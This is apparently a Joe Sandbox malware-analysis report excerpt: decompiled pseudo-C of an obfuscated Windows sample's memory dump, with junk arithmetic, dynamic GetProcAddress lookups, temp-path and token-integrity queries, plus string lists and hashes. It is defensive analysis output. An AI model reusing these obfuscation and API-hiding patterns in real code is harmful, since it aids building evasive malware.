                                                          				_t137 = 0x55ee4b;
                                                          				 *0x508178 = 0x55ee4b;
                                                          				if(0x55ee4b != 0x55ee4b) {
                                                          					 *0x508212 = _t142 - 1;
                                                          					_t142 = _t156;
                                                          					 *0x50afe3 =  *0x50afe3 - _t53;
                                                          					 *0x508341 =  *0x508341 + _t156;
                                                          				}
                                                          				if(_t53 <= 0) {
                                                          					 *0x50afe6 =  *0x50afe6 - _t53;
                                                          				}
                                                          				goto L5;
                                                          			}

                                                          APIs
                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 0047BA13
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: WcnEapAuthProxy.dll$api-ms-win-core-rtlsupport-l1-1-0.dll$credssp.dll$diskperf.exe$lyncicon.exe$wlanmsm.dll$wmi.dll$xmllite.dll$Nqt$U
                                                          • API String ID: 190572456-3303468885
                                                          • Opcode ID: a7914e15a3f12317fcde8e5cdfe82bea0286fb6708fbc60e86f4873224eb7090
                                                          • Instruction ID: c76e24b61a264235fe33c65509d8e77367c64379c17ed8c40d4b391394877020
                                                          • Opcode Fuzzy Hash: a7914e15a3f12317fcde8e5cdfe82bea0286fb6708fbc60e86f4873224eb7090
                                                          • Instruction Fuzzy Hash: 9991BEB9A043469FCB01DFB9ECD4ADD7BB0FB38310F04806AD984A7352E2740A49DB55
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetProcAddress.KERNEL32(?), ref: 0047018A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: ?{2$GetAccessPermissionsForObjectW$GetTickCount64$LookupPrivilegeValueA$SystemPropertiesComputerName.exe$api-ms-win-core-rtlsupport-l1-1-0.dll$credssp.dll$nshhttp.dll$xmllite.dll$Nqt
                                                          • API String ID: 190572456-3870129988
                                                          • Opcode ID: 2cab30468f7d760a0d0d278bde01168fc02f73c95343c1b18c22e352529df40f
                                                          • Instruction ID: a295487b95ef686a5edab79f77895e81132f6d1df3f40bcc32b5779569e5087f
                                                          • Opcode Fuzzy Hash: 2cab30468f7d760a0d0d278bde01168fc02f73c95343c1b18c22e352529df40f
                                                          • Instruction Fuzzy Hash: C581A175A50706DBCB00DFB8E894AED7BB1FB39310F44807AD989E7352E6390589EB05
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 45%
                                                          			E00495915(signed int __eax, signed int __edx, signed int __edi, void* __esi) {
                                                          				signed int _t42;
                                                          				signed int _t44;
                                                          				signed int _t45;
                                                          				signed int _t46;
                                                          				_Unknown_base(*)()* _t51;
                                                          				signed int _t58;
                                                          				intOrPtr _t68;
                                                          				void* _t75;
                                                          				char* _t84;
                                                          				char* _t92;
                                                          				signed int _t110;
                                                          				signed int _t111;
                                                          				short _t112;
                                                          				intOrPtr _t114;
                                                          				intOrPtr _t118;
                                                          				short _t121;
                                                          				void* _t129;
                                                          				intOrPtr _t132;
                                                          				signed int _t134;
                                                          				signed int _t136;
                                                          				void* _t137;
                                                          				void* _t139;
                                                          				void* _t140;
                                                          				void* _t143;
                                                          
                                                          				_t139 = __esi;
                                                          				_t134 = __edi;
                                                          				 *0x508170 =  *((intOrPtr*)(_t143 - 0x10));
                                                          				 *(_t143 - 8) = __eax;
                                                          				 *0x508af3 =  *((intOrPtr*)(_t143 - 0x10));
                                                          				 *((intOrPtr*)(_t143 - 0x10)) = 0x480795;
                                                          				_t42 =  *(_t143 - 8);
                                                          				 *(_t143 - 0x2c) = _t42;
                                                          				 *((intOrPtr*)(_t143 - 0x14)) =  *((intOrPtr*)(_t143 - 0x14)) + 0xffffffffffff9027;
                                                          				_t110 = __edx;
                                                          				_t121 =  *0x5081c6; // 0x64
                                                          				 *0x508210 = _t121;
                                                          				_t75 = 0x480795 - _t42;
                                                          				 *(_t143 - 8) = _t42;
                                                          				_t44 =  *(_t143 - 8);
                                                          				if(_t75 <= 0x32dd) {
                                                          					if(_t75 <= _t75) {
                                                          					}
                                                          					 *((intOrPtr*)(_t143 - 0x10)) =  *((intOrPtr*)(_t143 - 0x10)) - _t110;
                                                          					_t110 = 0x79d2;
                                                          				}
                                                          				 *0x50afdf =  *0x50afdf - _t121 + 1;
                                                          				_push( *(_t143 - 0x2c));
                                                          				_t136 = (_t134 ^ 0x0000e15d) + 1;
                                                          				if(_t44 < 0xd) {
                                                          					 *(_t143 - 0xc) = "RtlEthernetStringToAddressW";
                                                          					E0050814C = _t110;
                                                          					_t110 = _t110 + _t110 + 0x7be9;
                                                          					 *0x50993f =  *0x50993f - 0x8bae;
                                                          					_t139 = _t139 + _t136;
                                                          					 *0x50afe6 = _t44;
                                                          					_t136 = _t136 + 0x0000e269 ^ 0x0006005a;
                                                          				}
                                                          				 *(_t143 - 8) = _t44;
                                                          				if(_t44 < 0x263a) {
                                                          					_t118 =  *0x508150; // 0xeb66
                                                          					_t110 = _t118 - 1;
                                                          				}
                                                          				_t45 =  *(_t143 - 8);
                                                          				_t111 = _t110 & 0x000084d7;
                                                          				_t126 = 0x9c7f;
                                                          				_push( *0x508457);
                                                          				 *0x50870b =  *0x50870b - _t136;
                                                          				 *(_t143 - 8) = _t45;
                                                          				_t46 =  !_t45;
                                                          				if(0xf0 - _t45 == 0x31) {
                                                          					 *((intOrPtr*)(_t143 - 0x10)) =  *((intOrPtr*)(_t143 - 0x10)) - _t111;
                                                          					_t111 = _t111 - 0x63cd75;
                                                          					if(_t111 >= _t111) {
                                                          						_t126 = 0x9cff;
                                                          					}
                                                          					if((_t126 & 0x00008ed1) >= 0) {
                                                          						_t126 =  *0x50820c; // 0x96b5
                                                          						if((_t126 & 0x000000a9) >= 0) {
                                                          							 *0x50afe1 = _t46;
                                                          						}
                                                          						_t68 =  *0x50afe3; // -68
                                                          						 *0x50afe5 = _t68;
                                                          						_t136 = 0;
                                                          						goto L15;
                                                          					}
                                                          				}
                                                          				_t112 = _t111 - 0x608e;
                                                          				 *0x508192 = _t112;
                                                          				 *0x50822c = _t126 - 0x8768;
                                                          				_t51 = GetProcAddress(??, ??);
                                                          				_t129 = 0;
                                                          				 *(_t143 - 8) = _t51;
                                                          				E0046776D(_t136, _t139, 0, _t51);
                                                          				_t84 =  &(( *(_t143 - 0xc))[0x431b]);
                                                          				 *0x50afdc =  *0x50afdc + _t84;
                                                          				if(_t84 < _t84) {
                                                          					L19:
                                                          					 *0x508547 = 5;
                                                          				} else {
                                                          					_t112 = 0x6a87;
                                                          					 *0x508196 = 0x6a87;
                                                          					_t132 =  *0x5081e4; // 0x5a9a
                                                          					_t129 = _t132 - 0x99d5;
                                                          					if(_t139 == 0 || _t139 > 0) {
                                                          						goto L19;
                                                          					}
                                                          				}
                                                          				 *0x50afda =  *0x50afda + 0xa;
                                                          				_t58 =  *(_t143 - 8);
                                                          				 *0x509237 = _t58;
                                                          				_t140 = _t139 - 1;
                                                          				 *0x50afe5 =  *0x50afe5 - _t58;
                                                          				 *0x50ab50 =  *0x50ab50 + _t136;
                                                          				_t137 = _t136 + _t136;
                                                          				if(_t58 > 0) {
                                                          					 *0x508593 = _t58;
                                                          				}
                                                          				 *(_t143 - 8) = _t58;
                                                          				 *0x50afdd =  *0x50afdd + _t112;
                                                          				_t114 =  *0x508170; // 0x2575
                                                          				L004668D8(_t114, _t129, _t137, _t140, 0x50, 1, 0);
                                                          				_push(1);
                                                          				_push(0);
                                                          				_push(0x50);
                                                          				E00467687();
                                                          				if(0x50 >= 0x50) {
                                                          					 *0x508172 =  *0x508172 + 0x67de;
                                                          					_t114 = 0;
                                                          					 *0x50822a = 0;
                                                          				}
                                                          				_push(0);
                                                          				_t92 = "WindowsCodecs.dll";
                                                          				_push(_t92);
                                                          				_push(_t92);
                                                          				_push(0x495c0a);
                                                          				_push(L0046426A);
                                                          				return 0x205334;
                                                          			}
                                                          0x00495adf
                                                          0x00495ae7
                                                          0x00495aec
                                                          0x00495af4
                                                          0x00495b25
                                                          0x00495b31
                                                          0x00495af9
                                                          0x00495af9
                                                          0x00495afd
                                                          0x00495b07
                                                          0x00495b0e
                                                          0x00495b1e
                                                          0x00000000
                                                          0x00000000
                                                          0x00495b1e
                                                          0x00495b39
                                                          0x00495b44
                                                          0x00495b47
                                                          0x00495b4c
                                                          0x00495b4d
                                                          0x00495b53
                                                          0x00495b59
                                                          0x00495b64
                                                          0x00495b66
                                                          0x00495b6b
                                                          0x00495b70
                                                          0x00495b7d
                                                          0x00495b89
                                                          0x00495b9b
                                                          0x00495ba0
                                                          0x00495ba2
                                                          0x00495ba4
                                                          0x00495ba5
                                                          0x00495bad
                                                          0x00495bb6
                                                          0x00495bbd
                                                          0x00495bc8
                                                          0x00495bc8
                                                          0x00495be8
                                                          0x00495bf6
                                                          0x00495bfd
                                                          0x00495bfe
                                                          0x00495bff
                                                          0x00495c04
                                                          0x00495c09

                                                          APIs
                                                          • GetProcAddress.KERNEL32(?), ref: 00495ACE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: 4S $BuildExplicitAccessWithNameA$C+,$GetTickCount64$RtlEthernetStringToAddressW$WcnEapAuthProxy.dll$WindowsCodecs.dll$api-ms-win-core-sysinfo-l1-1-0.dll$xmllite.dll$Nqt
                                                          • API String ID: 190572456-1721917306
                                                          • Opcode ID: 574b6e9e3f0501391cabb72aa6967f10c8de5cd9f0a7ca218b20262ce62a97dd
                                                          • Instruction ID: 563760110c660385b03fcf752b6954c532313b4f910b973045bab0a02d9dd57a
                                                          • Opcode Fuzzy Hash: 574b6e9e3f0501391cabb72aa6967f10c8de5cd9f0a7ca218b20262ce62a97dd
                                                          • Instruction Fuzzy Hash: E3710FB8A047469FCB00EFB5E894ADE7FB1EF39310F04406AD981AB352E6740909DB19
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 26%
                                                          			E0046C7EE(void* __ebx, signed int __edx, signed int __edi, short __esi) {
                                                          				_Unknown_base(*)()* _t40;
                                                          				_Unknown_base(*)()* _t44;
                                                          				char* _t51;
                                                          				_Unknown_base(*)()* _t52;
                                                          				char* _t64;
                                                          				short _t101;
                                                          				void* _t102;
                                                          				unsigned short _t106;
                                                          				signed char _t107;
                                                          				short _t114;
                                                          				signed int _t119;
                                                          				unsigned short _t121;
                                                          				short _t126;
                                                          				signed int _t127;
                                                          				void* _t129;
                                                          
                                                          				_t126 = __esi;
                                                          				_t119 = __edi;
                                                          				_t113 = __edx;
                                                          				if((__edx & 0x00008218) == 0) {
                                                          					_t113 =  !__edx;
                                                          					 *0x5081fc = _t113;
                                                          				}
                                                          				if(_t126 >= 0) {
                                                          					_t126 = _t126 + _t126;
                                                          					 *0x50afe6 =  *0x50afe6 + 0x188;
                                                          					_t119 = (_t119 | 0x000000ec) & 0x0000f85c;
                                                          					E0050892F = E0050892F + "Microsoft.Office.Tools.Outlook.v9.0.ni.dll";
                                                          				}
                                                          				 *0x50afdd =  *0x50afdd + 0x441df2;
                                                          				_push( *0x5083db);
                                                          				_t64 = "api-ms-win-core-rtlsupport-l1-1-0.dll";
                                                          				_t101 = 0xffffffffffff9944;
                                                          				if(_t64 > 0x32a6a8) {
                                                          					if(_t64 != _t64) {
                                                          						_t64 =  &(_t64[0x47dd6e]);
                                                          					}
                                                          					 *0x508158 = _t101;
                                                          					_t101 = 0;
                                                          				}
                                                          				_t102 = _t101 + 0x7f6f;
                                                          				 *0x50977f =  *0x50977f - _t113;
                                                          				 *0x5081dc = _t113;
                                                          				_t40 = GetProcAddress(??, ??);
                                                          				 *0x50afe1 = _t40;
                                                          				if(_t126 == 0) {
                                                          					 *0x50aac0 =  *0x50aac0 - _t126;
                                                          					 *0x50afe5 = _t40;
                                                          					_t64 = 0xfb;
                                                          					 *0x508008 =  *0x508008 - _t40;
                                                          				}
                                                          				if("WindowsCodecs.dll" >= 0x3b) {
                                                          					_t102 = 0;
                                                          					_t113 = _t113 + 0x8968;
                                                          					 *0x50afdf =  *0x50afdf + _t113;
                                                          				}
                                                          				_t114 = _t126;
                                                          				_t127 = _t113;
                                                          				 *(_t129 - 8) = _t40;
                                                          				_t44 =  *(_t129 - 8);
                                                          				 *0x50959b = _t44;
                                                          				 *0x50afe1 =  *0x50afe1 - _t44;
                                                          				if(_t44 != 0) {
                                                          					L15:
                                                          					 *0x50afda =  *0x50afda + 0x3133a0;
                                                          					 *(_t129 - 0x10) = 0x3133a0;
                                                          					_t102 = (0x6e0c >> 0x6e0c) - _t114;
                                                          					_t114 = _t114 + _t114 + 0x98;
                                                          					 *0x508224 = _t114;
                                                          				} else {
                                                          					if(_t119 == 0) {
                                                          						 *0x50802e =  *0x50802e + _t44;
                                                          						 *0x50afd9 =  *0x50afd9;
                                                          						goto L15;
                                                          					}
                                                          				}
                                                          				_t121 = 0xffffffffffff0bea;
                                                          				_push(0);
                                                          				 *(_t129 - 8) = _t44;
                                                          				 *(_t129 - 0x10) = "nshhttp.dll";
                                                          				_t106 = _t102 + _t102;
                                                          				 *((intOrPtr*)(_t129 - 0xc)) = 0x2cf0fc;
                                                          				L004668D8(_t106, _t114, 0xffffffffffff0bea, _t127, 0x59e1f8, 1, 0);
                                                          				_t107 = _t106 >> _t106;
                                                          				_t51 = "wmi.dll";
                                                          				if(0x504c47 <= 0x3b09) {
                                                          					L19:
                                                          					 *0x5081cc = _t114;
                                                          					_t114 = 0xa96b;
                                                          					 *0x50afe1 = _t51;
                                                          					_t51 = 0xd4;
                                                          					if((_t121 & _t127) == 0) {
                                                          						_t121 = _t121 >> _t107;
                                                          						goto L21;
                                                          					}
                                                          				} else {
                                                          					if(0x504c47 <= 0x504c47) {
                                                          						L21:
                                                          						_t121 = _t121 + 0x4632d;
                                                          					} else {
                                                          						 *0x508128 = _t107;
                                                          						_t107 = 0x723a;
                                                          						goto L19;
                                                          					}
                                                          				}
                                                          				_t52 =  *(_t129 - 8);
                                                          				_push( *0x508088);
                                                          				if(_t107 >= _t107) {
                                                          					 *0x5081d0 = _t114;
                                                          				}
                                                          				 *0x50afe1 = _t52;
                                                          				 *0x50afe6 = _t52;
                                                          				_push( *0x508088);
                                                          				 *0x50848f = _t52;
                                                          				 *(_t129 - 8) = _t52;
                                                          				_push(_t52);
                                                          				_push(_t52);
                                                          				_push(E0046CAB8);
                                                          				_push(E0046776D);
                                                          				return _t52;
                                                          			}



















                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: Microsoft.Office.Tools.Outlook.v9.0.ni.dll$M6$System.Web.DynamicData.dll$WindowsCodecs.dll$api-ms-win-core-rtlsupport-l1-1-0.dll$nshhttp.dll$pYqt$pYqt$wmi.dll$Nqt
                                                          • API String ID: 190572456-2047549566
                                                          • Opcode ID: 6cd8d8952440b883448f5414f09d1045ee7fb2fb21663ab4f17c290dcf054d1c
                                                          • Instruction ID: 9c18c483867493fffe04861d5b726bac731bb9b74bd01f732072e74015f29e7b
                                                          • Opcode Fuzzy Hash: 6cd8d8952440b883448f5414f09d1045ee7fb2fb21663ab4f17c290dcf054d1c
                                                          • Instruction Fuzzy Hash: AF61DFB9B543468FCB01DF78EC94BED3BB1EB39310F08416A9884D7352E6740849DB46
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 77%
                                                          			E004B196F(void* __eax, void* __ebx, void* __edx, signed short __edi, signed short __esi, void* __eflags) {
                                                          				signed char _t68;
                                                          				signed char _t72;
                                                          				signed char _t76;
                                                          				signed char _t88;
                                                          				signed char _t89;
                                                          				signed char _t91;
                                                          				intOrPtr _t94;
                                                          				intOrPtr _t98;
                                                          				intOrPtr _t105;
                                                          				char* _t112;
                                                          				signed char _t119;
                                                          				signed int _t161;
                                                          				signed short _t170;
                                                          				signed short _t171;
                                                          				signed short _t173;
                                                          				void* _t174;
                                                          
                                                          				_t173 = __esi;
                                                          				_t170 = __edi;
                                                          				L00466DA9(__ebx, __edi, __esi, 0x85d2, 0x85d2);
                                                          				_t94 =  *0x50afe3; // -68
                                                          				 *(_t174 - 8) = _t174 - 0x46c;
                                                          				L00464E9E(_t94, 0xffffffffffffe076, __esi, 0);
                                                          				 *((intOrPtr*)(_t174 - 0x18)) = _t94;
                                                          				if("BuildExplicitAccessWithNameA" <= 0x2b) {
                                                          					 *0x5080f2 =  *0x5080f2 - 0x3b3107;
                                                          					 *0x5081ac = 0xffffffffffffe100;
                                                          				}
                                                          				_t98 =  *((intOrPtr*)(_t174 - 0x10));
                                                          				 *((intOrPtr*)(_t174 - 0x14)) = _t98;
                                                          				_t68 =  *(_t174 - 8);
                                                          				 *(_t174 - 0x474) = _t68;
                                                          				 *0x508220 = 0x9bdc;
                                                          				_t161 = 0x00009bdc & _t173;
                                                          				 *(_t174 - 8) = _t68;
                                                          				 *((intOrPtr*)(_t174 - 0x14)) = _t98;
                                                          				_t72 =  *(_t174 - 8);
                                                          				 *(_t174 - 8) = _t72;
                                                          				 *(_t174 - 0xc) = _t72;
                                                          				_t76 =  *(_t174 - 8);
                                                          				 *((intOrPtr*)(_t174 - 0x18)) = 0x2b997c;
                                                          				 *((intOrPtr*)(_t174 - 0x18)) = 0x2b997c;
                                                          				_push( *(_t174 - 0x474));
                                                          				 *0x50afe1 = _t76;
                                                          				_t105 = 0xd3;
                                                          				 *(_t174 - 8) = _t76;
                                                          				if(_t76 < 0x113031) {
                                                          					 *(_t174 - 0x1c) = "SystemPropertiesComputerName.exe";
                                                          					_t105 =  *(_t174 - 0x20) - 0x5a1f;
                                                          					if((_t161 & 0x007b4212) >= 0) {
                                                          					}
                                                          					_t76 = 0xbc;
                                                          					 *0x50afe3 =  *0x50afe3 - 0xbc;
                                                          					_t173 = 0;
                                                          				}
                                                          				_t171 = _t170;
                                                          				 *0x50afe6 = _t76 + 0xe4 - 0xec;
                                                          				 *((intOrPtr*)(_t174 - 0x14)) = _t105;
                                                          				 *(_t174 - 0x20) = "api-ms-win-core-rtlsupport-l1-1-0.dll";
                                                          				 *0x5081a2 = 0x69cac8;
                                                          				_t88 = GetTempPathW(0x104, ??);
                                                          				if(_t171 != 0) {
                                                          					 *0x50afe6 = _t88;
                                                          				}
                                                          				_t112 = "lyncicon.exe";
                                                          				if(_t88 != 0x3116) {
                                                          					L12:
                                                          					_t112 = _t88 + _t88;
                                                          					if(_t112 != 0x33) {
                                                          						goto L13;
                                                          					}
                                                          					goto L14;
                                                          				} else {
                                                          					if(_t112 == _t112) {
                                                          						 *(_t174 - 0x24) = _t112;
                                                          						if((_t88 & 0x000000ba) >= 0) {
                                                          							L13:
                                                          							 *(_t174 - 0x1c) =  &(( *(_t174 - 0x1c))[_t112]);
                                                          						} else {
                                                          							_t173 = _t173 + 0xc6e4;
                                                          							_t171 = _t171 >> 0xfffffffffffe201b;
                                                          							goto L12;
                                                          						}
                                                          						L14:
                                                          						 *0x508176 = 0x6170;
                                                          					}
                                                          				}
                                                          				_t119 = _t88;
                                                          				_t89 = _t88 + _t119;
                                                          				if((_t171 & _t173) == 0) {
                                                          					 *0x50afe6 = _t89;
                                                          				}
                                                          				if(_t171 <= 0x4ea) {
                                                          					_t119 = 0x2ed5d0;
                                                          				}
                                                          				 *(_t174 - 8) = _t89;
                                                          				_t91 =  *(_t174 - 0xc);
                                                          				 *0x50afda =  *0x50afda - _t91;
                                                          				 *0x5080ae =  *0x5080ae - _t119;
                                                          				_push(1);
                                                          				_push(0x4b1c14);
                                                          				_push(L004A9E48);
                                                          				return _t91;
                                                          			}

                                                          APIs
                                                          • GetTempPathW.KERNEL32(00000104,?,00000000,000085D2,000085D2), ref: 004B1B46
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: PathTemp
                                                          • String ID: BuildExplicitAccessWithNameA$CIRCoInst.dll$SystemPropertiesComputerName.exe$WcnEapAuthProxy.dll$ZwLoadKeyEx$api-ms-win-core-rtlsupport-l1-1-0.dll$charmap.exe$diskperf.exe$lyncicon.exe$wmi.dll
                                                          • API String ID: 2920410445-4198680935
                                                          • Opcode ID: ed294de963d9aa101be26fad55a27d2d63b0a3619ae6a461edb6cdafcf68bbfa
                                                          • Instruction ID: 69e065a493c3c7da7e1db9ee443ee437d24dd3f9a274a9ab539054f4f4af9e5d
                                                          • Opcode Fuzzy Hash: ed294de963d9aa101be26fad55a27d2d63b0a3619ae6a461edb6cdafcf68bbfa
                                                          • Instruction Fuzzy Hash: 8971D275E0430A8FCB00DFB8C8E0AEEBBF1FB2D320F44416AD940A7352E2381A458B55
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: EnumWindowStationsA$EtwEventWriteStartScenario$RemoveVectoredExceptionHandler$SystemPropertiesComputerName.exe$WSearchMigPlugin.dll$api-ms-win-core-sysinfo-l1-1-0.dll$credssp.dll$qS:$Nqt
                                                          • API String ID: 190572456-4021970367
                                                          • Opcode ID: 58f77f4c459cc923fb0bb4a5e02ef4cbe8a7f36437c7a9d2efb20143269c61e6
                                                          • Instruction ID: 3ce6bcee4b1523cb18ef34ea52ee1e8efc0e920c753f469567aca674a12bbc61
                                                          • Opcode Fuzzy Hash: 58f77f4c459cc923fb0bb4a5e02ef4cbe8a7f36437c7a9d2efb20143269c61e6
                                                          • Instruction Fuzzy Hash: 9891AC74A147069FCB00EFB9E894AED7BB0FF39320B44806AD985D7362E6740949E745
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),00000001,00000001,SystemPropertiesComputerName.exe,?,?,?), ref: 004AA9A7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: InformationToken
                                                          • String ID: ;:%$CIRCoInst.dll$Microsoft.Office.Tools.Outlook.v9.0.ni.dll$RtlEthernetStringToAddressW$SystemPropertiesComputerName.exe$lprmonui.dll$wmi.dll$~0>
                                                          • API String ID: 4114910276-414117194
                                                          • Opcode ID: 6ffcf11a0cceb10f65e297bc4cfa8325d29b1d31172b221f66799fa90ca36eef
                                                          • Instruction ID: 0074c2b5aa3de914f79d5e1df6a4f390b162db03097377c5267d726bf168f664
                                                          • Opcode Fuzzy Hash: 6ffcf11a0cceb10f65e297bc4cfa8325d29b1d31172b221f66799fa90ca36eef
                                                          • Instruction Fuzzy Hash: 6FB1D0B9E443469FCB00DFB8D894ADE7FB1EF39310B44406AC88597322D778494ADB46
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetProcAddress.KERNEL32(?), ref: 004A7C70
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: EtwEventWriteStartScenario$RemoveVectoredExceptionHandler$RtlEthernetStringToAddressW$SystemPropertiesComputerName.exe$diskperf.exe$e~8$lyncicon.exe$Nqt
                                                          • API String ID: 190572456-3986226046
                                                          • Opcode ID: b369350f807e65ed7d35adad650d10f5037d8cc152dfd4d0b60ca499b69cda8c
                                                          • Instruction ID: b309d37d325e5cc95c4722d0876e4b697e2b4e8f9f776b3c3b149e2ca7d5becf
                                                          • Opcode Fuzzy Hash: b369350f807e65ed7d35adad650d10f5037d8cc152dfd4d0b60ca499b69cda8c
                                                          • Instruction Fuzzy Hash: 2781DFAAA44742CFCB11DF78EC589DE3B71EB3A724708426EC8809BB66E6340549E745
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 48%
                                                          			E0048C5CA() {
                                                          				_Unknown_base(*)()* _t27;
                                                          				_Unknown_base(*)()* _t31;
                                                          				_Unknown_base(*)()* _t32;
                                                          				_Unknown_base(*)()* _t35;
                                                          				_Unknown_base(*)()* _t43;
                                                          				short _t72;
                                                          				signed char _t73;
                                                          				intOrPtr _t75;
                                                          				void* _t82;
                                                          				signed short _t83;
                                                          				void* _t85;
                                                          				signed short _t86;
                                                          				signed int _t88;
                                                          				signed int _t89;
                                                          				unsigned short _t90;
                                                          				void* _t93;
                                                          
                                                          				 *0x50afdd =  *0x50afdd + _t72;
                                                          				 *0x508150 = _t72;
                                                          				_t27 =  *(_t93 - 8);
                                                          				_t73 =  *0x5081a0; // 0xea90
                                                          				 *0x50afdf =  *0x50afdf - _t82;
                                                          				 *0x5081ea =  *0x5081ea + _t82;
                                                          				_t83 = _t82 + _t82;
                                                          				 *(_t93 - 8) = _t27;
                                                          				_push(_t27);
                                                          				_push(_t27);
                                                          				_push(_t27);
                                                          				E00467687();
                                                          				_push( *0x5083db);
                                                          				_t31 =  *(_t93 - 8);
                                                          				 *0x50afdc =  *0x50afdc +  *((intOrPtr*)(_t93 - 0xc));
                                                          				 *((intOrPtr*)(_t93 - 0x10)) =  *((intOrPtr*)(_t93 - 0x10)) - _t73;
                                                          				if(_t73 != _t73) {
                                                          					L3:
                                                          					_t83 = 0xa7ba;
                                                          					 *0x50afe1 = _t31;
                                                          					L4:
                                                          					_t32 = GetProcAddress();
                                                          					 *0x5081fa =  *0x5081fa - _t83;
                                                          					_t85 = _t83 + _t83;
                                                          					if((_t90 & 0x00ac94b7) == 0) {
                                                          						_t90 = _t90 >> _t73;
                                                          					}
                                                          					_t89 =  !_t88;
                                                          					 *0x50afd8 =  *0x50afd8 - _t32;
                                                          					_t56 = 0xec - _t32 + 0x1be5;
                                                          					 *(_t93 - 8) = _t32;
                                                          					if(0xec - _t32 + 0x1be5 < 0x2e3bee) {
                                                          						_t56 = "lprmonui.dll";
                                                          						_t73 = _t73 + _t73 - 0x72a0;
                                                          						 *0x5081ae =  *0x5081ae - _t85;
                                                          					}
                                                          					 *0x5081cc =  *0x5081cc + _t85;
                                                          					E004650DC(_t56, _t73, _t85, _t89, _t90, _t85);
                                                          					_t86 = _t85 + 0xad;
                                                          					_t35 =  *(_t93 - 8);
                                                          					 *0x50914b = _t35;
                                                          					 *(_t93 - 8) = _t35;
                                                          					if(_t35 != 0x27) {
                                                          						 *0x50afdc =  *0x50afdc - 0x3f3010;
                                                          						 *0x5081a2 = _t86;
                                                          						_t86 = _t86 - 0x98;
                                                          						if((_t86 & 0x00009d2e) >= 0) {
                                                          							 *0x50823c = _t90;
                                                          						}
                                                          						_t90 = 0x508289;
                                                          						 *0x50afe5 = _t35;
                                                          					}
                                                          					 *((intOrPtr*)(_t93 - 0x14)) =  *((intOrPtr*)(_t93 - 0x14)) - 0x5556b6;
                                                          					 *0x508170 = 0x5556b6;
                                                          					_push(0);
                                                          					_t75 =  *0x50815a; // 0x98
                                                          					 *0x5081c4 = _t86;
                                                          					_t43 =  *(_t93 - 8);
                                                          					 *((intOrPtr*)(_t93 - 0xc)) = 0x2cc8e7;
                                                          					if(_t75 + 0x73 >= _t75 + 0x73) {
                                                          						_t86 = 0x986e;
                                                          					}
                                                          					 *0x509b1f =  *0x509b1f + _t86;
                                                          					_push( *0x508044);
                                                          					 *0x50afe6 = _t43;
                                                          					 *(_t93 - 8) = _t43;
                                                          					_push(_t43);
                                                          					_push(1);
                                                          					_push(E0048C7C2);
                                                          					goto __eax;
                                                          				}
                                                          				_t73 = _t73 - 0x72;
                                                          				if((_t73 & 0x00000082) >= 0) {
                                                          					goto L4;
                                                          				}
                                                          				 *0x5081c4 = _t83;
                                                          				goto L3;
                                                          			}

                                                          APIs
                                                          • GetProcAddress.KERNEL32(?,?), ref: 0048C655
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
